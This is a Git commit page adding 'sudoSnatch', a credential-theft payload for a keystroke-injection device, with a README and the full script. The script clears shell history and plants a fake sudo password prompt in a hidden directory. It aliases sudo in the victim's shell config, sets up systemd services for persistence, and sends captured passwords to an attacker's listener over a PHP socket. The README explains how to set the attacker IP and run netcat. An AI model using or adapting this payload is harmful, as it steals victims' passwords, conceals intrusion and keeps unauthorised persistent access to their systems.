hak5
/
omg-payloads
mirror of https://github.com/hak5/omg-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #48 from drapl0n/patch-2 

uploading SudoSnatch
pull/50/head
OMG-MG 2022-05-17 14:06:42 -07:00 committed by GitHub
parent d8387711b0 24b019672c
commit 133c7bd5ed
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 115 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

33
payloads/library/credentials/SudoSnatch/README.md Normal file
View File

@ -0,0 +1,33 @@
## About:
* Title: sudoSnatch
* Description: sudoSnatch grabs plain text passwords remotely/locally.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Credentials
* Target: Unix-like operating systems with systemd.
## sudoSnatch: sudoSnatch payload grabs sudo password in plain text, imediately after target uses `sudo` command and sends it back to attacker remotely/locally.
### Features:
* Plain text passwords.
* Detailed password logs.
* Persistent
* Autostart payload on boot.
### Workflow:
* Injecting payload on target's system.
* Checks whether internet is connected to the target system.
* If internet is connected then it sends clear text passwords to attacker.
### Changes to be made in payload.sh:
* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line `32`.
* Increase/Decrease time interval to restart service periodically (Default is 15 mins) on line `48`.
### Usage:
1. Inject payload into target's system.
2. Start netcat listner on attacking system:
* `nc -l -p <port number>` use this command to fetch passwords.
#### Support me if you like my work:
* https://twitter.com/drapl0n

82
payloads/library/credentials/SudoSnatch/payload.txt Normal file
View File

@ -0,0 +1,82 @@
REM Title: sudoSnatch
REM Description: sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally..
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Credentials
REM Target: Unix-like operating systems with systemd
REM Attackmodes: HID
REM [keeping tracks clear]
DELAY 5000
CTRL ALT t
DELAY 400
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
ENTER
DELAY 100
REM [creating password grabbing mechanism]
STRING mkdir /var/tmp/.system
ENTER
DELAY 100
STRING echo -e "#\!/bin/bash\necho -n \"[sudo] password for \$(whoami):\"\nIFS=\"\" read -s pass\necho -e \"Timestamp=[\$(date)] \\\t User=[\$(whoami)] \\\t Password=[\$pass]\" >> /var/tmp/.system/sysLog\necho -e \"\\\nSorry, try again.\"" > /var/tmp/.system/systemMgr
ENTER
DELAY 100
STRING touch /var/tmp/.system/sysLog
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/systemMgr
ENTER
DELAY 100
REM [creating reverse shell]
STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/systemBus
ENTER
DELAY 100
REM [creating systemd service to execute payload on boot]
STRING mkdir -p ~/.config/systemd/user
ENTER
DELAY 200
STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
ENTER
DELAY 100
REM [creating reboot script incase if listner stops or targets internet connection gets lost]
STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/reboot
ENTER
DELAY 100
REM [creating systemd service for reboot]
STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
ENTER
DELAY 100
REM [enabling services]
STRING systemctl --user daemon-reload
ENTER
DELAY 300
STRING systemctl --user enable --now systemBUS.service
ENTER
DELAY 150
STRING systemctl --user start --now systemBUS.service
ENTER
DELAY 150
STRING systemctl --user enable --now reboot.service
ENTER
DELAY 150
STRING systemctl --user start --now reboot.service
ENTER
DELAY 100
REM [autostarting service on terminal/shell launch]
STRING echo -e "#\!/bin/bash\nls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.zshrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.bashrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.bashrc\nfi" > ~/tmmmp
ENTER
DELAY 100
STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
ENTER